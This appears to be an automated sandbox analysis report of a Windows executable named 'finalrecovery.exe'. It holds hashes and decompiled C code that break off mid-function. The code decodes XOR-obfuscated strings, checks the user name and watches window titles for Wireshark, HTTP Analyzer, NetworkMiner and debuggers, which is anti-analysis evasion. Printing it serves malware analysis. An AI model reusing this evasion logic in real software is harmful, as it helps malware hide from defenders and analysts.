API ID: CommandHandleLineModule
String ID: 4u
API String ID: 2123368496-2138366680
Opcode ID: 746e9a92de36605cdfd87c84c822714f18c0eb0a2b64ce99e66b90c69837d839
Instruction ID: 938fc5d7150061a66cd9a397de50459b98cc473a78e96f9e03329754a5f1b6bd
Opcode Fuzzy Hash: 746e9a92de36605cdfd87c84c822714f18c0eb0a2b64ce99e66b90c69837d839
Instruction Fuzzy Hash: 57C002A09012058AE750AFB6A84AB552A94A751349F8044BFB104BA2E2DA7D82156BDF

Uniqueness

Uniqueness Score: -1.00%

Function 00454890 Relevance: 5.0, APIs: 4, Instructions: 45
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00454890(long __eax, intOrPtr __edx, long _a4, long _a8) {
				intOrPtr _v8;
				long _t5;
				long _t9;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t5 = __eax;
				_v8 = __edx;
				_t9 = __eax;
				_t15 = _t10 - 1;
				if(_t15 < 0) {
					L10:
					return _t5;
				}
				_t16 = _t15 + 1;
				_t13 = 0;
				while(1) {
					_t19 = _t13 - 1;
					if(_t13 != 1) {
						__eflags = _t13 - 1;
						if(__eflags > 0) {
							Sleep(_a4);
						}
					} else {
						Sleep(_a8);
					}
					_t5 = E00451C68(_t9, _v8, _t19);
					if(_t5 != 0) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 2) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 3) {
						goto L10;
					}
					_t13 = _t13 + 1;
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L10;
				}
				goto L10;
			}

0x00454890
0x00454897
0x0045489a
0x0045489e
0x004548a1
0x004548ef
0x004548ef
0x004548ef
0x004548a3
0x004548a4
0x004548a6
0x004548a6
0x004548a9
0x004548b6
0x004548b9
0x004548bf
0x004548bf
0x004548ab
0x004548af
0x004548af
0x004548c9
0x004548d0
0x00000000
0x00000000
0x004548d2
0x004548da
0x00000000
0x00000000
0x004548dc
0x004548e4
0x00000000
0x00000000
0x004548e6
0x004548e7
0x004548e8
0x00000000
0x00000000
0x00000000
0x004548e8
0x00000000

APIs

Sleep.KERNEL32(?), ref: 004548AF
Sleep.KERNEL32(?), ref: 004548BF
GetLastError.KERNEL32 ref: 004548D2
GetLastError.KERNEL32 ref: 004548DC

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: 8d185a95fc3116ca394655233112a5b1a6ef76c4e96e399a001de924a7dbdc80
Instruction ID: bb5436bd1afa1b5b0edb46f81817bb6cbc242dc966f94768ac6a47bd1cf447a6
Opcode Fuzzy Hash: 8d185a95fc3116ca394655233112a5b1a6ef76c4e96e399a001de924a7dbdc80
Instruction Fuzzy Hash: 65F0F03AA00554578F20F99E9C81A2F628CDAD0B6E710016BEC04DF343C439CD89A6A9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: finalrecovery.exePID: 6076, Parent PID: 6100COMMON

Execution Graph

Execution Coverage:	6.8%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	8.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	20

Executed Functions

Function 004056A0 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 514
sleepCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E004056A0(void* __ebx, void* __ecx, void* __edi) {
				long _v8;
				intOrPtr* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v96;
				struct _SID_IDENTIFIER_AUTHORITY _v104;
				long _v108;
				void* _v112;
				void* _v116;
				char _v284;
				char _v288;
				int _v292;
				char _v296;
				char _v300;
				long _v304;
				long _v308;
				intOrPtr _v312;
				char _v313;
				long _v320;
				long _v324;
				long _v328;
				long _v332;
				long _v340;
				long* _v344;
				long _v348;
				long _v352;
				long _v356;
				long _v364;
				long _v372;
				char _v428;
				signed int _v432;
				long _v696;
				intOrPtr _v700;
				signed int _v792;
				short _v872;
				long _v876;
				void* _v884;
				void* __esi;
				void* __ebp;
				signed int _t234;
				signed int _t235;
				intOrPtr _t238;
				signed char _t239;
				signed char _t240;
				CHAR _t245;
				void* _t248;
				intOrPtr _t251;
				signed char _t252;
				signed int _t253;
				intOrPtr _t258;
				void* _t261;
				intOrPtr _t262;
				signed char _t263;
				signed char _t264;
				intOrPtr _t269;
				void* _t272;
				struct HWND__* _t273;
				intOrPtr _t275;
				void* _t279;
				intOrPtr* _t280;
				long _t285;
				void* _t286;
				signed int _t289;
				signed int _t290;
				intOrPtr _t293;
				signed char _t294;
				signed int _t295;
				signed int _t297;
				int _t298;
				intOrPtr _t300;
				signed char _t301;
				signed int _t302;
				signed int _t304;
				intOrPtr _t305;
				signed char _t306;
				signed int _t307;
				signed int _t309;
				struct HWND__* _t310;
				intOrPtr _t312;
				signed int _t313;
				signed int _t318;
				long _t319;
				signed int _t324;
				signed int _t328;
				signed int _t333;
				signed int _t337;
				int _t338;
				long _t343;
				intOrPtr _t347;
				signed char _t348;
				signed int _t349;
				signed int _t354;
				signed int _t355;
				signed int _t360;
				signed int _t366;
				signed int _t371;
				signed int _t376;
				void* _t382;
				void* _t386;
				void* _t388;
				void* _t390;
				void* _t392;
				intOrPtr _t393;
				void* _t395;
				void* _t397;
				struct HWND__* _t398;
				intOrPtr _t400;
				void* _t404;
				long _t407;
				long _t411;
				long _t420;
				long _t424;
				long _t433;
				long _t437;
				void* _t448;
				void* _t449;
				void* _t451;
				intOrPtr _t452;
				void* _t454;
				signed int _t456;
				void* _t457;
				void* _t458;
				signed char* _t459;
				CHAR* _t462;
				signed int* _t470;
				intOrPtr* _t473;
				signed char* _t477;
				intOrPtr* _t480;
				intOrPtr* _t485;
				intOrPtr* _t488;
				signed char* _t489;
				signed char* _t496;
				signed char* _t499;
				intOrPtr* _t503;
				long _t506;
				long _t511;
				signed char* _t512;
				void* _t518;
				intOrPtr* _t520;
				long _t523;
				long _t524;
				signed char* _t525;
				void* _t526;
				long _t528;
				long _t529;
				signed int* _t530;
				void* _t531;
				long _t533;
				signed char* _t534;
				void* _t535;
				long _t537;
				void* _t538;
				intOrPtr* _t539;
				void* _t541;
				long* _t542;
				void* _t543;
				void* _t544;
				void* _t545;
				void* _t546;
				void* _t548;
				void* _t549;
				intOrPtr _t550;
				signed char* _t552;
				void* _t553;
				signed char* _t554;
				signed char* _t555;
				intOrPtr _t556;
				intOrPtr _t560;
				void* _t561;
				intOrPtr* _t562;
				intOrPtr _t564;
				void* _t565;
				void* _t567;
				intOrPtr* _t568;
				signed int _t569;
				void* _t570;
				signed int _t571;
				signed int _t572;
				void* _t573;
				void* _t574;
				signed int _t576;
				void* _t577;
				long* _t578;
				long* _t579;
				long* _t580;
				long* _t581;
				long* _t582;
				long* _t583;
				signed int _t584;

				_t458 = __ecx;
				_t447 = __ebx;
				_push(0xffffffff);
				_push(E0042C631);
				_push( *[fs:0x0]);
				_t574 = _t573 - 0x168;
				_t234 =  *0x43d054; // 0x8e1b5714
				_t235 = _t234 ^ _t569;
				_v24 = _t235;
				_push(__ebx);
				_push(__edi);
				_push(_t235);
				 *[fs:0x0] =  &_v16;
				_v324 = 0;
				_v308 = 0;
				_v304 = 0xf;
				_v324 = 0;
				_v8 = 0;
				_v296 = 0x47434a4f;
				_v292 = 0x2e40;
				_t560 =  *((intOrPtr*)( *[fs:0x2c]));
				_t238 =  *0x450ec4; // 0x0
				if(_t238 >  *((intOrPtr*)(_t560 + 4))) {
					E0040EEC8(_t238, 0x450ec4);
					_t574 = _t574 + 4;
					_t594 =  *0x450ec4 - 0xffffffff;
					if( *0x450ec4 == 0xffffffff) {
						_t11 =  &_v296; // 0x47434a4f
						 *0x450f08 =  *_t11;
						 *0x450f0c = _v292;
						E0040F1DA(_t458, _t594, E0042CEB0);
						E0040EE7E(0x450ec4);
						_t574 = _t574 + 8;
					}
				}
				_t239 =  *0x450f0d; // 0x0
				if(_t239 != 0) {
					 *0x450f08 =  *0x450f08 ^ 0x0000002e;
					 *0x450f09 =  *0x450f09 ^ 0x0000002e;
					 *0x450f0a =  *0x450f0a ^ 0x0000002e;
					 *0x450f0b =  *0x450f0b ^ 0x0000002e;
					 *0x450f0c =  *0x450f0c ^ 0x0000002e;
					 *0x450f0d = _t239 ^ 0x0000002e;
				}
				_t459 = 0x450f08;
				_v348 = 0;
				_v332 = 0;
				_v328 = 0xf;
				_v348 = 0;
				_t17 =  &(_t459[1]); // 0x450f09
				_t525 = _t17;
				goto L6;
				do {
					L8:
					_t245 =  *_t462;
					_t462 = _t462 + 1;
				} while (_t245 != 0);
				E004026C0(_t447,  &_v372,  &_v288, _t462 - _t526);
				_t465 =  &_v372;
				_t248 = E0040C9E0( &_v372,  &_v348);
				_t528 = _v352;
				_t448 = _t248;
				if(_t528 < 0x10) {
					L13:
					_v8 = 0;
					_t529 = _v328;
					if(_t529 < 0x10) {
						L17:
						if(_t448 != 0) {
							L76:
							 *[fs:0x0] = _v16;
							_pop(_t549);
							_pop(_t561);
							_pop(_t449);
							return E0040EB3F(0, _t449, _v24 ^ _t569, _t529, _t549, _t561);
						} else {
							_t251 =  *0x450fd8; // 0x0
							_v296 = 0x464f467d;
							if(_t251 >  *((intOrPtr*)(_t560 + 4))) {
								E0040EEC8(_t251, 0x450fd8);
								_t574 = _t574 + 4;
								_t608 =  *0x450fd8 - 0xffffffff;
								if( *0x450fd8 == 0xffffffff) {
									_t41 =  &_v296; // 0x464f467d
									 *0x451000 =  *_t41;
									 *0x451004 = 0x2e;
									E0040F1DA(_t465, _t608, E0042CE90);
									E0040EE7E(0x450fd8);
									_t574 = _t574 + 8;
								}
							}
							_t252 =  *0x451004;
							if(_t252 != 0) {
								 *0x451000 =  *0x451000 ^ 0x0000002e;
								 *0x451001 =  *0x451001 ^ 0x0000002e;
								 *0x451002 =  *0x451002 ^ 0x0000002e;
								 *0x451003 =  *0x451003 ^ 0x0000002e;
								 *0x451004 = _t252 ^ 0x0000002e;
							}
							_t470 = 0x451000;
							_v348 = 0;
							_v332 = 0;
							_v328 = 0xf;
							_v348 = 0;
							_t46 =  &(_t470[0]); // 0x451001
							_t530 = _t46;
							do {
								_t253 =  *_t470;
								_t470 =  &(_t470[0]);
							} while (_t253 != 0);
							E004026C0(0x2e,  &_v348, 0x451000, _t470 - _t530);
							_t48 =  &_v296; // 0x464f467d
							_v8 = 2;
							_v296 = 0x101;
							GetUserNameA( &_v288, _t48);
							_t473 =  &_v288;
							_v372 = 0;
							_v356 = 0;
							_t531 = _t473 + 1;
							_v352 = 0xf;
							do {
								_t258 =  *_t473;
								_t473 = _t473 + 1;
							} while (_t258 != 0);
							E004026C0(0x2e,  &_v372,  &_v288, _t473 - _t531);
							_t476 =  &_v372;
							_t261 = E0040C9E0( &_v372,  &_v348);
							_t533 = _v352;
							_t451 = _t261;
							if(_t533 < 0x10) {
								L31:
								_v8 = 0;
								_t529 = _v328;
								if(_t529 < 0x10) {
									L35:
									if(_t451 != 0) {
										goto L76;
									} else {
										_t262 =  *0x450ec0; // 0x0
										_v300 = 0x5a5d4b5a;
										_v296 = 0x4d404b6c;
										_v292 = 0x2e46;
										if(_t262 >  *((intOrPtr*)(_t560 + 4))) {
											E0040EEC8(_t262, 0x450ec0);
											_t574 = _t574 + 4;
											_t622 =  *0x450ec0 - 0xffffffff;
											if( *0x450ec0 == 0xffffffff) {
												asm("movq xmm0, [ebp-0x128]");
												asm("movq [0x450d30], xmm0");
												 *0x450d38 = _v292;
												E0040F1DA(_t476, _t622, E0042CE70);
												E0040EE7E(0x450ec0);
												_t574 = _t574 + 8;
											}
										}
										_t263 =  *0x450d39; // 0x0
										if(_t263 != 0) {
											 *0x450d30 =  *0x450d30 ^ 0x0000002e;
											 *0x450d31 =  *0x450d31 ^ 0x0000002e;
											 *0x450d32 =  *0x450d32 ^ 0x0000002e;
											 *0x450d33 =  *0x450d33 ^ 0x0000002e;
											 *0x450d34 =  *0x450d34 ^ 0x0000002e;
											 *0x450d35 =  *0x450d35 ^ 0x0000002e;
											 *0x450d36 =  *0x450d36 ^ 0x0000002e;
											 *0x450d37 =  *0x450d37 ^ 0x0000002e;
											 *0x450d38 =  *0x450d38 ^ 0x0000002e;
											 *0x450d39 = _t263 ^ 0x0000002e;
										}
										_t477 = 0x450d30;
										_v348 = 0;
										_v332 = 0;
										_v328 = 0xf;
										_v348 = 0;
										_t77 =  &(_t477[1]); // 0x450d31
										_t534 = _t77;
										do {
											_t264 =  *_t477;
											_t477 =  &(_t477[1]);
										} while (_t264 != 0);
										E004026C0(_t451,  &_v348, 0x450d30, _t477 - _t534);
										_t79 =  &_v296; // 0x4d404b6c
										_v8 = 3;
										_v296 = 0x101;
										GetUserNameA( &_v288, _t79);
										_t480 =  &_v288;
										_v372 = 0;
										_v356 = 0;
										_t535 = _t480 + 1;
										_v352 = 0xf;
										do {
											_t269 =  *_t480;
											_t480 = _t480 + 1;
										} while (_t269 != 0);
										E004026C0(_t451,  &_v372,  &_v288, _t480 - _t535);
										_t272 = E0040C9E0( &_v372,  &_v348);
										_t537 = _v352;
										_t451 = _t272;
										if(_t537 < 0x10) {
											L49:
											_v8 = 0;
											_t529 = _v328;
											if(_t529 < 0x10) {
												L53:
												if(_t451 != 0) {
													goto L76;
												} else {
													_t273 = GetForegroundWindow(); // executed
													GetWindowTextA(_t273,  &_v288, 0xc8);
													_t485 =  &_v288;
													_t538 = _t485 + 1;
													do {
														_t275 =  *_t485;
														_t485 = _t485 + 1;
													} while (_t275 != 0);
													E004026C0(_t451,  &_v324,  &_v288, _t485 - _t538);
													_t279 = E00410160( &_v288, " Far ");
													_t574 = _t574 + 8;
													if(_t279 == 0) {
														_t451 = Sleep;
														while(1) {
															_t386 = E00410160( &_v288, "roxifier");
															_t574 = _t574 + 8;
															if(_t386 != 0) {
																goto L72;
															}
															_t388 = E00410160( &_v288, "HTTP Analyzer");
															_t574 = _t574 + 8;
															if(_t388 == 0) {
																_t390 = E00410160( &_v288, "Wireshark");
																_t574 = _t574 + 8;
																if(_t390 == 0) {
																	_t392 = E00410160( &_v288, "NetworkMiner");
																	_t574 = _t574 + 8;
																	if(_t392 == 0) {
																		_t568 =  &_v288;
																		_t518 = _t568 + 1;
																		do {
																			_t393 =  *_t568;
																			_t568 = _t568 + 1;
																		} while (_t393 != 0);
																		_t560 = _t568 - _t518;
																		_t548 = 0;
																		if(_t560 > 0) {
																			do {
																				 *((char*)(_t569 + _t548 - 0x11c)) = E004181F5( *((char*)(_t569 + _t548 - 0x11c)));
																				_t574 = _t574 + 4;
																				_t548 = _t548 + 1;
																			} while (_t548 < _t560);
																		}
																		_t395 = E00410160( &_v288, "dbg");
																		_t574 = _t574 + 8;
																		if(_t395 == 0) {
																			_t397 = E00410160( &_v288, "debug");
																			_t574 = _t574 + 8;
																			if(_t397 == 0) {
																				Sleep(0x258); // executed
																				_t398 = GetForegroundWindow(); // executed
																				GetWindowTextA(_t398,  &_v288, 0xc8);
																				_t520 =  &_v288;
																				_t543 = _t520 + 1;
																				do {
																					_t400 =  *_t520;
																					_t520 = _t520 + 1;
																				} while (_t400 != 0);
																				E004026C0(_t451,  &_v324,  &_v288, _t520 - _t543);
																				_t404 = E00410160( &_v288, " Far ");
																				_t574 = _t574 + 8;
																				if(_t404 == 0) {
																					continue;
																				}
																			}
																		}
																	}
																}
															}
															goto L72;
														}
													}
													L72:
													_t529 = _v304;
													if(_t529 < 0x10) {
														goto L76;
													} else {
														_t488 = _v324;
														_t529 = _t529 + 1;
														_t280 = _t488;
														if(_t529 < 0x1000) {
															L75:
															_push(_t529);
															E0040ED7F(_t488);
															goto L76;
														} else {
															_t488 =  *((intOrPtr*)(_t488 - 4));
															_t529 = _t529 + 0x23;
															if(_t280 - _t488 + 0xfffffffc > 0x1f) {
																goto L77;
															} else {
																goto L75;
															}
														}
													}
												}
											} else {
												_t523 = _v348;
												_t529 = _t529 + 1;
												_t407 = _t523;
												if(_t529 < 0x1000) {
													L52:
													_push(_t529);
													E0040ED7F(_t523);
													_t574 = _t574 + 8;
													goto L53;
												} else {
													_t488 =  *((intOrPtr*)(_t523 - 4));
													_t529 = _t529 + 0x23;
													if(_t407 - _t488 + 0xfffffffc > 0x1f) {
														goto L77;
													} else {
														goto L52;
													}
												}
											}
										} else {
											_t524 = _v372;
											_t544 = _t537 + 1;
											_t411 = _t524;
											if(_t544 < 0x1000) {
												L48:
												_push(_t544);
												E0040ED7F(_t524);
												_t574 = _t574 + 8;
												goto L49;
											} else {
												_t488 =  *((intOrPtr*)(_t524 - 4));
												_t529 = _t544 + 0x23;
												if(_t411 - _t488 + 0xfffffffc > 0x1f) {
													goto L77;
												} else {
													goto L48;
												}
											}
										}
									}
								} else {
									_t476 = _v348;
									_t529 = _t529 + 1;
									_t420 = _t476;
									if(_t529 < 0x1000) {
										L34:
										_push(_t529);
										E0040ED7F(_t476);
										_t574 = _t574 + 8;
										goto L35;
									} else {
										_t488 =  *((intOrPtr*)(_t476 - 4));
										_t529 = _t529 + 0x23;
										if(_t420 - _t488 + 0xfffffffc > 0x1f) {
											goto L77;
										} else {
											goto L34;
										}
									}
								}
							} else {
								_t476 = _v372;
								_t545 = _t533 + 1;
								_t424 = _t476;
								if(_t545 < 0x1000) {
									L30:
									_push(_t545);
									E0040ED7F(_t476);
									_t574 = _t574 + 8;
									goto L31;
								} else {
									_t488 =  *((intOrPtr*)(_t476 - 4));
									_t529 = _t545 + 0x23;
									if(_t424 - _t488 + 0xfffffffc > 0x1f) {
										goto L77;
									} else {
										goto L30;
									}
								}
							}
						}
					} else {
						_t465 = _v348;
						_t529 = _t529 + 1;
						_t433 = _t465;
						if(_t529 < 0x1000) {
							L16:
							_push(_t529);
							E0040ED7F(_t465);
							_t574 = _t574 + 8;
							goto L17;
						} else {
							_t488 =  *((intOrPtr*)(_t465 - 4));
							_t529 = _t529 + 0x23;
							if(_t433 - _t488 + 0xfffffffc > 0x1f) {
								goto L77;
							} else {
								goto L16;
							}
						}
					}
				} else {
					_t465 = _v372;
					_t546 = _t528 + 1;
					_t437 = _t465;
					if(_t546 < 0x1000) {
						L12:
						_push(_t546);
						E0040ED7F(_t465);
						_t574 = _t574 + 8;
						goto L13;
					} else {
						_t488 =  *((intOrPtr*)(_t465 - 4));
						_t529 = _t546 + 0x23;
						if(_t437 - _t488 + 0xfffffffc > 0x1f) {
							L77:
							E004134A7(_t451, _t529, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t569);
							_t570 = _t574;
							_push(_t488);
							__eflags =  *((intOrPtr*)(_t529 + 0x14)) - 0x10;
							_t285 = _t529;
							_push(_t451);
							_push(_t560);
							_push(_t548);
							_t562 = _t488;
							if( *((intOrPtr*)(_t529 + 0x14)) >= 0x10) {
								_t285 =  *_t529;
							}
							__eflags =  *((intOrPtr*)(_t562 + 0x14)) - 0x10;
							if( *((intOrPtr*)(_t562 + 0x14)) >= 0x10) {
								_t488 =  *_t562;
							}
							_t452 =  *((intOrPtr*)(_t529 + 0x10));
							_t539 = _t562 + 0x10;
							_t550 =  *_t539;
							_v12 = _t539;
							_t286 = E004028A0(_t488, _t550, _t488, _t285, _t452);
							_t541 = _t286;
							_t576 = _t574 + 0xc;
							__eflags = _t541 - 0xffffffff;
							if(_t541 == 0xffffffff) {
								L87:
								return _t286;
							} else {
								__eflags = _t550 - _t541;
								if(_t550 < _t541) {
									E00402800(_t488, _t541);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t570);
									_t571 = _t576;
									_push(0xffffffff);
									_push(E0042C687);
									_push( *[fs:0x0]);
									_t577 = _t576 - 0x154;
									_t289 =  *0x43d054; // 0x8e1b5714
									_t290 = _t289 ^ _t571;
									_v432 = _t290;
									_push(_t452);
									_push(_t562);
									_push(_t550);
									_push(_t290);
									 *[fs:0x0] =  &_v428;
									_v696 = 0;
									_v700 = 0x455d4f5a;
									_v696 = 0x2e5c4943;
									_t564 =  *((intOrPtr*)( *[fs:0x2c]));
									_t293 =  *0x450ebc; // 0x80000010
									__eflags = _t293 -  *((intOrPtr*)(_t564 + 4));
									if(_t293 >  *((intOrPtr*)(_t564 + 4))) {
										E0040EEC8(_t293, 0x450ebc);
										_t577 = _t577 + 4;
										__eflags =  *0x450ebc - 0xffffffff;
										if(__eflags == 0) {
											_t143 =  &_v296; // 0x455d4f5a
											_t144 =  &_v292; // 0x2e5c4943
											 *0x450d40 =  *_t143;
											 *0x450d44 =  *_t144;
											E0040F1DA( *_t144, __eflags, E0042CF40);
											E0040EE7E(0x450ebc);
											_t577 = _t577 + 8;
										}
									}
									_t294 =  *0x450d47; // 0x0
									__eflags = _t294;
									if(_t294 != 0) {
										 *0x450d40 =  *0x450d40 ^ 0x0000002e;
										 *0x450d41 =  *0x450d41 ^ 0x0000002e;
										 *0x450d42 =  *0x450d42 ^ 0x0000002e;
										 *0x450d43 =  *0x450d43 ^ 0x0000002e;
										 *0x450d44 =  *0x450d44 ^ 0x0000002e;
										 *0x450d45 =  *0x450d45 ^ 0x0000002e;
										 *0x450d46 =  *0x450d46 ^ 0x0000002e;
										_t376 = _t294 ^ 0x0000002e;
										__eflags = _t376;
										 *0x450d47 = _t376;
									}
									_t578 = _t577 - 0x18;
									_t489 = 0x450d40;
									_t542 = _t578;
									_t145 =  &(_t489[1]); // 0x450d41
									_t552 = _t145;
									 *_t542 = 0;
									_t542[4] = 0;
									_t542[5] = 0xf;
									asm("o16 nop [eax+eax]");
									do {
										_t295 =  *_t489;
										_t489 =  &(_t489[1]);
										__eflags = _t295;
									} while (_t295 != 0);
									E004026C0(_t452, _t542, 0x450d40, _t489 - _t552); // executed
									_t297 = E00405350(_t452); // executed
									_t579 =  &(_t578[6]);
									__eflags = _t297;
									if(_t297 != 0) {
										L145:
										_t298 = 1;
										goto L146;
									} else {
										_t300 =  *0x450fa0; // 0x80000011
										_v296 = 0x455d4f7a;
										_v292 = 0x2e5c4943;
										__eflags = _t300 -  *((intOrPtr*)(_t564 + 4));
										if(_t300 >  *((intOrPtr*)(_t564 + 4))) {
											E0040EEC8(_t300, 0x450fa0);
											_t579 =  &(_t579[1]);
											__eflags =  *0x450fa0 - 0xffffffff;
											if(__eflags == 0) {
												_t151 =  &_v296; // 0x455d4f7a
												_t152 =  &_v292; // 0x2e5c4943
												 *0x450f6c =  *_t151;
												 *0x450f70 =  *_t152;
												E0040F1DA( *_t152, __eflags, E0042CF30);
												E0040EE7E(0x450fa0);
												_t579 =  &(_t579[2]);
											}
										}
										_t301 =  *0x450f73; // 0x0
										__eflags = _t301;
										if(_t301 != 0) {
											 *0x450f6c =  *0x450f6c ^ 0x0000002e;
											 *0x450f6d =  *0x450f6d ^ 0x0000002e;
											 *0x450f6e =  *0x450f6e ^ 0x0000002e;
											 *0x450f6f =  *0x450f6f ^ 0x0000002e;
											 *0x450f70 =  *0x450f70 ^ 0x0000002e;
											 *0x450f71 =  *0x450f71 ^ 0x0000002e;
											 *0x450f72 =  *0x450f72 ^ 0x0000002e;
											_t371 = _t301 ^ 0x0000002e;
											__eflags = _t371;
											 *0x450f73 = _t371;
										}
										_t580 = _t579 - 0x18;
										_t496 = 0x450f6c;
										_t542 = _t580;
										_t153 =  &(_t496[1]); // 0x450f6d
										_t554 = _t153;
										 *_t542 = 0;
										_t542[4] = 0;
										_t542[5] = 0xf;
										do {
											_t302 =  *_t496;
											_t496 =  &(_t496[1]);
											__eflags = _t302;
										} while (_t302 != 0);
										_t498 = _t542;
										E004026C0(_t452, _t542, 0x450f6c, _t496 - _t554); // executed
										_t304 = E00405350(_t452); // executed
										_t581 =  &(_t580[6]);
										__eflags = _t304;
										if(_t304 != 0) {
											goto L145;
										} else {
											_t305 =  *0x450f74; // 0x80000012
											_v296 = 0x4b5c4759;
											_v292 = 0x5c4f465d;
											_v288 = 0x2e45;
											__eflags = _t305 -  *((intOrPtr*)(_t564 + 4));
											if(_t305 >  *((intOrPtr*)(_t564 + 4))) {
												E0040EEC8(_t305, 0x450f74);
												_t581 =  &(_t581[1]);
												__eflags =  *0x450f74 - 0xffffffff;
												if(__eflags == 0) {
													asm("movq xmm0, [ebp-0x11c]");
													asm("movq [0x450d60], xmm0");
													 *0x450d68 = _v288;
													E0040F1DA(_t498, __eflags, E0042CF10);
													E0040EE7E(0x450f74);
													_t581 =  &(_t581[2]);
												}
											}
											_t306 =  *0x450d69; // 0x0
											__eflags = _t306;
											if(_t306 != 0) {
												 *0x450d60 =  *0x450d60 ^ 0x0000002e;
												 *0x450d61 =  *0x450d61 ^ 0x0000002e;
												 *0x450d62 =  *0x450d62 ^ 0x0000002e;
												 *0x450d63 =  *0x450d63 ^ 0x0000002e;
												 *0x450d64 =  *0x450d64 ^ 0x0000002e;
												 *0x450d65 =  *0x450d65 ^ 0x0000002e;
												 *0x450d66 =  *0x450d66 ^ 0x0000002e;
												 *0x450d67 =  *0x450d67 ^ 0x0000002e;
												 *0x450d68 =  *0x450d68 ^ 0x0000002e;
												_t366 = _t306 ^ 0x0000002e;
												__eflags = _t366;
												 *0x450d69 = _t366;
											}
											_t582 = _t581 - 0x18;
											_t499 = 0x450d60;
											_t542 = _t582;
											_t161 =  &(_t499[1]); // 0x450d61
											_t555 = _t161;
											 *_t542 = 0;
											_t542[4] = 0;
											_t542[5] = 0xf;
											do {
												_t307 =  *_t499;
												_t499 =  &(_t499[1]);
												__eflags = _t307;
											} while (_t307 != 0);
											E004026C0(_t452, _t542, 0x450d60, _t499 - _t555); // executed
											_t309 = E00405350(_t452); // executed
											_t583 =  &(_t582[6]);
											__eflags = _t309;
											if(_t309 != 0) {
												goto L145;
											} else {
												_t310 = GetForegroundWindow(); // executed
												__eflags = _t310;
												if(_t310 == 0) {
													L144:
													_t298 = 0;
													goto L146;
												} else {
													GetWindowTextA(_t310,  &_v284, 0x100);
													_t312 =  *0x450f9c; // 0x80000013
													_v312 = 0x4d415c7e;
													_v308 = 0xe5d5d4b;
													_v304 = 0x454d4f66;
													_v300 = 0x5c4b;
													__eflags = _t312 -  *((intOrPtr*)(_t564 + 4));
													if(_t312 >  *((intOrPtr*)(_t564 + 4))) {
														E0040EEC8(_t312, 0x450f9c);
														_t583 =  &(_t583[1]);
														__eflags =  *0x450f9c - 0xffffffff;
														if(__eflags == 0) {
															_t170 =  &_v304; // 0x454d4f66
															asm("movq xmm0, [ebp-0x12c]");
															 *0x450f4c =  *_t170;
															_t171 =  &_v300; // 0x5c4b
															asm("movq [0x450f44], xmm0");
															 *0x450f50 =  *_t171;
															 *0x450f52 = 0x2e;
															E0040F1DA( &_v284, __eflags, E0042CEE0);
															E0040EE7E(0x450f9c);
															_t583 =  &(_t583[2]);
														}
													}
													__eflags =  *0x450f52;
													if( *0x450f52 != 0) {
														_t360 = 0;
														__eflags = 0;
														do {
															 *(_t360 + 0x450f44) =  *(_t360 + 0x450f44) ^ 0x0000002e;
															_t360 = _t360 + 1;
															__eflags = _t360 - 0xf;
														} while (_t360 < 0xf);
													}
													_t503 = 0x450f44;
													_v364 = 0;
													_v348 = 0;
													_v344 = 0xf;
													_v364 = 0;
													_t178 = _t503 + 1; // 0x450f45
													_t542 = _t178;
													do {
														_t313 =  *_t503;
														_t503 = _t503 + 1;
														__eflags = _t313;
													} while (_t313 != 0);
													E004026C0(0x2e,  &_v364, 0x450f44, _t503 - _t542);
													_v16 = 0;
													__eflags = _v344 - 0x10;
													_t456 = 1;
													_v292 = 1;
													_t316 =  >=  ? _v364 :  &_v364;
													_t318 = E00410160( &_v284,  >=  ? _v364 :  &_v364);
													_t584 =  &(_t583[2]);
													__eflags = _t318;
													if(_t318 != 0) {
														L131:
														_v313 = 1;
													} else {
														_t347 =  *0x450f40; // 0x80000014
														_v308 = 0x4b5c4779;
														_v304 = 0x5c4f465d;
														_v300 = 0x2e45;
														__eflags = _t347 -  *((intOrPtr*)(_t564 + 4));
														if(_t347 >  *((intOrPtr*)(_t564 + 4))) {
															E0040EEC8(_t347, 0x450f40);
															_t584 = _t584 + 4;
															__eflags =  *0x450f40 - 0xffffffff;
															if(__eflags == 0) {
																asm("movq xmm0, [ebp-0x128]");
																_t190 =  &_v300; // 0x2e45
																asm("movq [0x450fc8], xmm0");
																 *0x450fd0 =  *_t190;
																E0040F1DA( &_v364, __eflags, E0042CEC0);
																E0040EE7E(0x450f40);
